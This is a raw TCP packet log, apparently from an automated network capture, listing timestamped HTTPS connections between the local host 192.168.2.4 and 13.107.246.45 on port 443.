Nov 11, 2024 01:14:56.105493069 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105525017 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.105591059 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105741978 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105752945 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.106323957 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.106730938 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.106777906 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.106812954 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.106821060 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.106831074 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.106834888 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.108750105 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.108797073 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.109004021 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.109004021 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.109036922 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115031004 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115051031 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115107059 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.115118027 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115156889 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115158081 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.115228891 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.115277052 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.115277052 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.115287066 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.115294933 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.117259979 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.117292881 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.117372990 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.117496014 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.117506981 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121114969 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121136904 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121191025 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.121206045 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121257067 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.121296883 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121334076 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121357918 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.121368885 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.121381044 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.121385098 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.123399019 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.123428106 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.123500109 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.123626947 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.123642921 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.826155901 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.826919079 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.826934099 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.827332020 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.827337027 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.833906889 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.834330082 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.834341049 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.834525108 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.834762096 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.834784985 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.834800959 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.834806919 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.835175991 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.835180998 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.849020004 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.849567890 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.849576950 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.849603891 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.849858046 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.849874020 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.850038052 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.850044012 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.850323915 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.850330114 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.955730915 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.955781937 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.955877066 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.960038900 CET	49772	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.960062981 CET	443	49772	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.963294983 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.963421106 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.963479996 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.963530064 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.963537931 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.963555098 CET	49771	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.963561058 CET	443	49771	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.963918924 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.963960886 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.964040995 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.964212894 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.964226007 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.964721918 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.964767933 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.964814901 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.964951992 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.964962959 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.964987040 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.964993954 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.965975046 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.965993881 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.966068983 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.966176987 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.966183901 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.966944933 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.966964006 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.967032909 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.967176914 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.967190981 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.979722977 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.979849100 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.979911089 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.979988098 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.980000973 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.980010033 CET	49773	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.980014086 CET	443	49773	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.981925964 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.981935978 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.982006073 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.982139111 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.982148886 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.030745983 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.030831099 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.030875921 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.031140089 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.031155109 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.031167984 CET	49774	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.031172991 CET	443	49774	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.036885977 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.036906958 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.036955118 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.037178993 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.037193060 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.692871094 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.693432093 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.693449974 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.693953991 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.693960905 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.695568085 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.695914984 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.695929050 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.696346998 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.696352005 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.714376926 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.714715004 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.714725971 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.715135098 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.715138912 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.756372929 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.756725073 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.756740093 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.757145882 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.757155895 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.826375961 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.826541901 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.826601028 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.826689959 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.826703072 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.826713085 CET	49776	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.826718092 CET	443	49776	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.827162027 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.827586889 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.827658892 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.827694893 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.827704906 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.827713966 CET	49777	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.827719927 CET	443	49777	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.829699039 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.829740047 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.829822063 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.829827070 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.829854965 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.829904079 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.829956055 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.829971075 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.830065966 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.830092907 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.841808081 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.842190981 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.842210054 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.842654943 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.842659950 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.842983961 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.843046904 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.843107939 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.843197107 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.843202114 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.843236923 CET	49778	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.843240976 CET	443	49778	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.845316887 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.845333099 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.845408916 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.845662117 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.845669031 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.889727116 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.889992952 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.890079021 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.890113115 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.890127897 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.890139103 CET	49779	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.890144110 CET	443	49779	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.893062115 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.893088102 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.893295050 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.893439054 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.893449068 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.977502108 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.977615118 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.977672100 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.977919102 CET	49775	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.977937937 CET	443	49775	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.982803106 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.982816935 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:57.982976913 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.983165979 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:57.983175993 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.566417933 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.567114115 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.567127943 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.567622900 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.567629099 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.567774057 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.568032026 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.568049908 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.568378925 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.568382978 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.578701973 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.578963995 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.578972101 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.579288960 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.579293013 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.632874966 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.633577108 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.633596897 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.634023905 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.634027958 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.696161985 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.696398020 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.696463108 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.696515083 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.696532011 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.696542025 CET	49781	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.696553946 CET	443	49781	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.698376894 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.698669910 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.698765039 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.698890924 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.698904037 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.698915005 CET	49780	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.698919058 CET	443	49780	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.699598074 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.699626923 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.699711084 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.699846983 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.699863911 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.701071978 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.701095104 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.701163054 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.701294899 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.701304913 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.706721067 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.706832886 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.706906080 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.706947088 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.706952095 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.706985950 CET	49782	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.706989050 CET	443	49782	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.709505081 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.709517002 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.709575891 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.709686041 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.709698915 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.721852064 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.722218990 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.722225904 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.722692013 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.722696066 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.853351116 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.853401899 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.853590012 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.853935957 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.853941917 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.853972912 CET	49784	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.853976965 CET	443	49784	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.855201960 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.856903076 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.856930971 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.857100964 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.857263088 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.857275963 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.857418060 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.857467890 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.857489109 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.857506037 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.857517004 CET	49783	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.857522011 CET	443	49783	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.859566927 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.859595060 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:58.859668016 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.859795094 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:58.859807968 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.426853895 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.427423000 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.427457094 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.427928925 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.427934885 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.441998959 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.442300081 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.442323923 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.442655087 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.442663908 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.446595907 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.446897030 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.446906090 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.447299957 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.447304964 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.558131933 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.558495045 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.558559895 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.558597088 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.558609962 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.558623075 CET	49785	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.558629036 CET	443	49785	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.561665058 CET	49790	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.561696053 CET	443	49790	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.561780930 CET	49790	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.561959982 CET	49790	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.561969995 CET	443	49790	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.578577042 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.578624964 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.578763008 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.578957081 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.578962088 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.578974009 CET	49787	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.578977108 CET	443	49787	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.581528902 CET	49791	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.581558943 CET	443	49791	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.581640959 CET	49791	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.581779957 CET	49791	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.581792116 CET	443	49791	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.581944942 CET	443	49786	13.107.246.45	192.168.2.4
